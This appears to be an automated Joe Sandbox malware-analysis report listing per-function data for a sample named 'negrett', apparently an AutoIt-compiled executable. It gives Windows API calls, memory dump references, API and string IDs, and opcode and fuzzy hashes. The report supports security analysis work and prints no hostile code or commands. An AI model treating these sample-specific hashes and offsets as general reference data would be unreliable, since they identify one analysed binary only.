                                                control_flow_graph 1445 b43073-b43087 1446 b43094-b430af LoadLibraryExW 1445->1446 1447 b43089-b43092 1445->1447 1449 b430b1-b430ba GetLastError 1446->1449 1450 b430d8-b430de 1446->1450 1448 b430eb-b430ed 1447->1448 1453 b430bc-b430c7 LoadLibraryExW 1449->1453 1454 b430c9 1449->1454 1451 b430e7 1450->1451 1452 b430e0-b430e1 FreeLibrary 1450->1452 1456 b430e9-b430ea 1451->1456 1452->1451 1455 b430cb-b430cd 1453->1455 1454->1455 1455->1450 1457 b430cf-b430d6 1455->1457 1456->1448 1457->1456
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00B113C6,00000000,00000000,?,00B4301A,00B113C6,00000000,00000000,00000000,?,00B4328B,00000006,FlsSetValue), ref: 00B430A5
                                                • GetLastError.KERNEL32(?,00B4301A,00B113C6,00000000,00000000,00000000,?,00B4328B,00000006,FlsSetValue,00BB2290,FlsSetValue,00000000,00000364,?,00B42E46), ref: 00B430B1
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B4301A,00B113C6,00000000,00000000,00000000,?,00B4328B,00000006,FlsSetValue,00BB2290,FlsSetValue,00000000), ref: 00B430BF
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID:
                                                • API String ID: 3177248105-0
                                                • Opcode ID: 5399db1a05849cdf2deb9451571e7f18921d93bca5cba6b9153cca831d6c80dc
                                                • Instruction ID: 8af617831cb11136f1fda8cc12e8728435051dbc14a32444d26c0369b262b64f
                                                • Opcode Fuzzy Hash: 5399db1a05849cdf2deb9451571e7f18921d93bca5cba6b9153cca831d6c80dc
                                                • Instruction Fuzzy Hash: 3F01A732711222ABCB314B799C85B577BD8EF46F61B290760F906E7340DB21DB01D6E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00B30668
                                                  • Part of subcall function 00B332A4: RaiseException.KERNEL32(?,?,?,00B3068A,?,00BE1444,?,?,?,?,?,?,00B3068A,00B11129,00BD8738,00B11129), ref: 00B33304
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00B30685
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Exception@8Throw$ExceptionRaise
                                                • String ID: Unknown exception
                                                • API String ID: 3476068407-410509341
                                                • Opcode ID: 2b23e1b78dd378d64a7e387555a7d665741d2e415b018d7ad534a994a6a80119
                                                • Instruction ID: 8fc18933de5f7b78824b97b752c4a8cbb746ae2ebf801579736b1b3466af6a36
                                                • Opcode Fuzzy Hash: 2b23e1b78dd378d64a7e387555a7d665741d2e415b018d7ad534a994a6a80119
                                                • Instruction Fuzzy Hash: 01F0C23490020EB7CB00B6A4EC96CAE77FC9E00750F7045F1B828D65A5EF71EA66C680
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00B8302F
                                                • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00B83044
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Temp$FileNamePath
                                                • String ID: aut
                                                • API String ID: 3285503233-3010740371
                                                • Opcode ID: c4390b581a35b8aecffe19c39a020509adc54d76219d5b37e8e1f23dbb7eb4d8
                                                • Instruction ID: b54129c0d05094fc598c47a9669b035e4bdfb2e5ac78eb5951aa659f1a188e75
                                                • Opcode Fuzzy Hash: c4390b581a35b8aecffe19c39a020509adc54d76219d5b37e8e1f23dbb7eb4d8
                                                • Instruction Fuzzy Hash: 2DD05B7150031467DA2097949D0EFC77F6CD705750F0001927655D3091DEB09544CAD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00B982F5
                                                • TerminateProcess.KERNEL32(00000000), ref: 00B982FC
                                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 00B984DD
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Process$CurrentFreeLibraryTerminate
                                                • String ID:
                                                • API String ID: 146820519-0
                                                • Opcode ID: f254bffb1c08c65b263b69ef881729674eeaaf7d29eecb14c7ae306783d58d01
                                                • Instruction ID: c354841d18ddf461cfd922c22c97caa5c4be9bc99c93162682a473aa37920020
                                                • Opcode Fuzzy Hash: f254bffb1c08c65b263b69ef881729674eeaaf7d29eecb14c7ae306783d58d01
                                                • Instruction Fuzzy Hash: 7F126B71A083419FCB14DF28C484B6ABBE5FF85314F1489ADE8998B352DB31E945CF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a4f0b50bef7d368e79d93c4d9ef41044413bc1f0d851077e930c789a726889bf
                                                • Instruction ID: dc604fa95de1eb61970a351f9711d535d9d21f643153f39f0791268e6da4aca0
                                                • Opcode Fuzzy Hash: a4f0b50bef7d368e79d93c4d9ef41044413bc1f0d851077e930c789a726889bf
                                                • Instruction Fuzzy Hash: 27516F71D00A0AABDB319FA9CD85FAE7FF4EF45310F140099F405A7293D6719B41AB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B11BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B11BF4
                                                  • Part of subcall function 00B11BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00B11BFC
                                                  • Part of subcall function 00B11BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B11C07
                                                  • Part of subcall function 00B11BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B11C12
                                                  • Part of subcall function 00B11BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00B11C1A
                                                  • Part of subcall function 00B11BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00B11C22
                                                  • Part of subcall function 00B11B4A: RegisterWindowMessageW.USER32(00000004,?,00B112C4), ref: 00B11BA2
                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00B1136A
                                                • OleInitialize.OLE32 ref: 00B11388
                                                • CloseHandle.KERNEL32(00000000), ref: 00B524AB
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                • String ID:
                                                • API String ID: 1986988660-0
                                                • Opcode ID: b7683e6912f9d118e586ab5fc75109d232faff55a6ec49a54031b308efa0292e
                                                • Instruction ID: 72baeb9ec3b6b13c2d33015f45470437337f260275be3bbc56e11f9451b981de
                                                • Opcode Fuzzy Hash: b7683e6912f9d118e586ab5fc75109d232faff55a6ec49a54031b308efa0292e
                                                • Instruction Fuzzy Hash: 4F7190B59153808EC384DF7DA9856A93AF4FBA93443B48EAAD41ACF361EF304481CF55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000001), ref: 00B1556D
                                                • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 00B1557D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: b904dbcc9a969254d5bee321ffce67cf59a363d0d085fe5a3f3efa73c4f0f3f8
                                                • Instruction ID: 89a15522696dd0d5e6361b0395603717509942492ab02e7d9615c108c251e53b
                                                • Opcode Fuzzy Hash: b904dbcc9a969254d5bee321ffce67cf59a363d0d085fe5a3f3efa73c4f0f3f8
                                                • Instruction Fuzzy Hash: AA316D71A00609EFDB24CF28C881BD9B7F6FB88714F548269E91597244D771FE94CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CloseHandle.KERNEL32(00000000), ref: 00B48704
                                                • GetLastError.KERNEL32(?,00B485CC,?,00BD8CC8,0000000C), ref: 00B4870E
                                                • __dosmaperr.LIBCMT ref: 00B48739
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                • String ID:
                                                • API String ID: 2583163307-0
                                                • Opcode ID: 48f8cdc26b17637fbc40350037cf6f7843f5a647bf3b4a3665c46d2a6c94beb8
                                                • Instruction ID: 1a36e90ce0189fa6595ded649a10026f29105ecb4fe3da4c30fa904674f22d43
                                                • Opcode Fuzzy Hash: 48f8cdc26b17637fbc40350037cf6f7843f5a647bf3b4a3665c46d2a6c94beb8
                                                • Instruction Fuzzy Hash: 53018E33A0466027D6B167346885B7E2BC9CB82774F3A01D9F8098B1D3DEB0CE81B194
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00B82FF2
                                                • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00B82CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B83006
                                                • CloseHandle.KERNEL32(00000000), ref: 00B8300D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleTime
                                                • String ID:
                                                • API String ID: 3397143404-0
                                                • Opcode ID: fd59a5fff3ab1e0f25d262e306dea2c4cdcacac5fa5324721e35927a53a80e9b
                                                • Instruction ID: a5d542a10cc21f7327ccbf4885fe4ead823b77dbc3643a87640c015430f4c38b
                                                • Opcode Fuzzy Hash: fd59a5fff3ab1e0f25d262e306dea2c4cdcacac5fa5324721e35927a53a80e9b
                                                • Instruction Fuzzy Hash: 31E0863238021077D6312755BC0EF8B3E5CD787F71F104210F719760D08EB0590183A8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 00B217F6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID: CALL
                                                • API String ID: 1385522511-4196123274
                                                • Opcode ID: d60e67e3b0e4b3da3c598e077f5026a7afdf0cd29a71852f46c1ee6a9abd9bdd
                                                • Instruction ID: 4b0bb929740556fae2045275f5e872ed249a1ad7aad8f82cdf118632b953da2c
                                                • Opcode Fuzzy Hash: d60e67e3b0e4b3da3c598e077f5026a7afdf0cd29a71852f46c1ee6a9abd9bdd
                                                • Instruction Fuzzy Hash: 28229B706082519FC714DF18D490B2ABBF1FFA9314F2489ADF49A8B3A1D735E941CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _wcslen.LIBCMT ref: 00B86F6B
                                                  • Part of subcall function 00B14ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00BE1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00B14EFD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: LibraryLoad_wcslen
                                                • String ID: >>>AUTOIT SCRIPT<<<
                                                • API String ID: 3312870042-2806939583
                                                • Opcode ID: 72a63ac88b6177133cd3df97444d702c04aac4906f59d3042aaade864365b288
                                                • Instruction ID: db2203a0a1284d522adca80d6cb0c10c954855eeb4b130ba279470c53e28cb22
                                                • Opcode Fuzzy Hash: 72a63ac88b6177133cd3df97444d702c04aac4906f59d3042aaade864365b288
                                                • Instruction Fuzzy Hash: 07B1A1311082018FCB14FF24C4919AEB7E5EF95304F54899DF49A972A2EF30ED89CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Info
                                                • String ID:
                                                • API String ID: 1807457897-3916222277
                                                • Opcode ID: 6ac29cafac31f580f757fc6c07260095c0c46d02404909e6d02d1678ec9d94fb
                                                • Instruction ID: e34950e0dd649d9fec6ea1efe1065847a241d6e4ffeb4f4a4bddbefbe9139fbf
                                                • Opcode Fuzzy Hash: 6ac29cafac31f580f757fc6c07260095c0c46d02404909e6d02d1678ec9d94fb
                                                • Instruction Fuzzy Hash: 92412B70505398AADF228F68CC84BFABFF9EB45B04F1404EDE58A87142D2359B45EF60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetOpenFileNameW.COMDLG32(?), ref: 00B52C8C
                                                  • Part of subcall function 00B13AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B13A97,?,?,00B12E7F,?,?,?,00000000), ref: 00B13AC2
                                                  • Part of subcall function 00B12DA5: GetLongPathNameW.KERNEL32 ref: 00B12DC4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Name$Path$FileFullLongOpen
                                                • String ID: X
                                                • API String ID: 779396738-3081909835
                                                • Opcode ID: 138bee2291e0b7c2842855632f3785fa4cde778b9fc2cf2eb3a89a723abb78b7
                                                • Instruction ID: 71599457e6201727d811ea9c4f93d04e4d9b500e4724391585aa23b6a0a2e0eb
                                                • Opcode Fuzzy Hash: 138bee2291e0b7c2842855632f3785fa4cde778b9fc2cf2eb3a89a723abb78b7
                                                • Instruction Fuzzy Hash: 2521D571A002589FDB01DF98C845BEEBBF8EF49704F40409AE405A7341EBB45A8D8F61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: __fread_nolock
                                                • String ID: EA06
                                                • API String ID: 2638373210-3962188686
                                                • Opcode ID: e54368c5e6c3dc5fe06789381731e0fd392bdfc1e19d70b034d5c5c302b488d0
                                                • Instruction ID: c86ff3a5ba8000ee12381f2f97c12a288159d8e3ecd56b78f2b49a1c6987cbaf
                                                • Opcode Fuzzy Hash: e54368c5e6c3dc5fe06789381731e0fd392bdfc1e19d70b034d5c5c302b488d0
                                                • Instruction Fuzzy Hash: 8201B572D442587EDF18D7A8C856FEEBBF8DB15301F00459AE592D21C1E5B4E608CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LCMapStringW.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,00000001,?,?,?,?,?), ref: 00B434D8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: String
                                                • String ID: LCMapStringEx
                                                • API String ID: 2568140703-3893581201
                                                • Opcode ID: ff8f507bb68676978493b13ddd689b3a1ec75b1ed3ff23d4f7f28db69d2c3df8
                                                • Instruction ID: 7aabfa98bfd9f7c741787f6506fda812281e8225826cff0293ea8d3444502795
                                                • Opcode Fuzzy Hash: ff8f507bb68676978493b13ddd689b3a1ec75b1ed3ff23d4f7f28db69d2c3df8
                                                • Instruction Fuzzy Hash: 5601D33264020DBBCF125F91DD02EEE7FE2EF48750F054194BE1466160CA769A71EB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: Alloc
                                                • String ID: FlsAlloc
                                                • API String ID: 2773662609-671089009
                                                • Opcode ID: e3af69b502af160b837d6633187451de341eb130465bf27aa9ac27d1fe893783
                                                • Instruction ID: cf5f00f071c91d6a26e840685a4fc886804be8c336733d95377b4948c03af987
                                                • Opcode Fuzzy Hash: e3af69b502af160b837d6633187451de341eb130465bf27aa9ac27d1fe893783
                                                • Instruction Fuzzy Hash: 2AE0E531745218A797156BA09D06ABDBFD4EF44B11B4401D5FD05A7250DDB05F00A6DA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • try_get_function.LIBVCRUNTIME ref: 00B33615
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                • Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_b10000_negrett.jbxd
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: FlsAlloc
                                                • API String ID: 2742660187-671089009
                                                • Opcode ID: 2fdb190faa7ec7c77cf54e56a07472a2aeaba846db9c4f7fee61a695ba10a4c4
                                                • Instruction ID: 0470e2fc8957b808077efc57a0c81f882322afd53b55ab89a166b1df9b128806
                                                • Opcode Fuzzy Hash: 2fdb190faa7ec7c77cf54e56a07472a2aeaba846db9c4f7fee61a695ba10a4c4
                                                • Instruction Fuzzy Hash: AED0123268E2256FC6103AD4AD07AFABEC4DB53FB2F0400F1FD085626199664A1046C5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 00B4C74F: GetOEMCP.KERNEL32(00000000), ref: 00B4C77A
                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00B4CA1D,?,00000000), ref: 00B4CBF0
                                                • GetCPInfo.KERNEL32(00000000,00B4CA1D,?,?,?,00B4CA1D,?,00000000), ref: 00B4CC03
                                                Memory Dump Source
